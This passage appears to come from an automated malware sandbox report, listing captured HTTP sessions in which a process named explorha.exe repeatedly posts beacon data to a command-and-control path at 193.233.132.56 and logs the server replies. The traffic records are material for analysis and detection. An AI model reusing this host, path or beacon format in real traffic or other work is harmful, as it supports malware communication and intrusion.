                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:32.937767029 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:33.189093113 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      21192.168.2.549793193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:33.875886917 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:34.123487949 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:34.171626091 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:34.423477888 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      22192.168.2.549794193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:35.837363005 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:36.088021994 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:36.117934942 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:36.372840881 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      23192.168.2.549796193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:36.893942118 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:37.142980099 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:37.148803949 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:37.400942087 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      24192.168.2.549799193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:37.762373924 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:38.005568981 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:38.006568909 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:38.253547907 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      25192.168.2.549800193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:38.611541033 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:38.856164932 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:38.857573986 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:39.104885101 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      26192.168.2.549802193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:39.480129004 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:39.728435040 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:39.769382954 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:40.022821903 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      27192.168.2.549805193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:40.382827997 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:40.629853010 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:40.633198023 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:40.884537935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      28192.168.2.549810193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:41.259679079 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:41.508354902 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:41.509511948 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:41.763334036 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      29192.168.2.549812193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:42.134469986 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
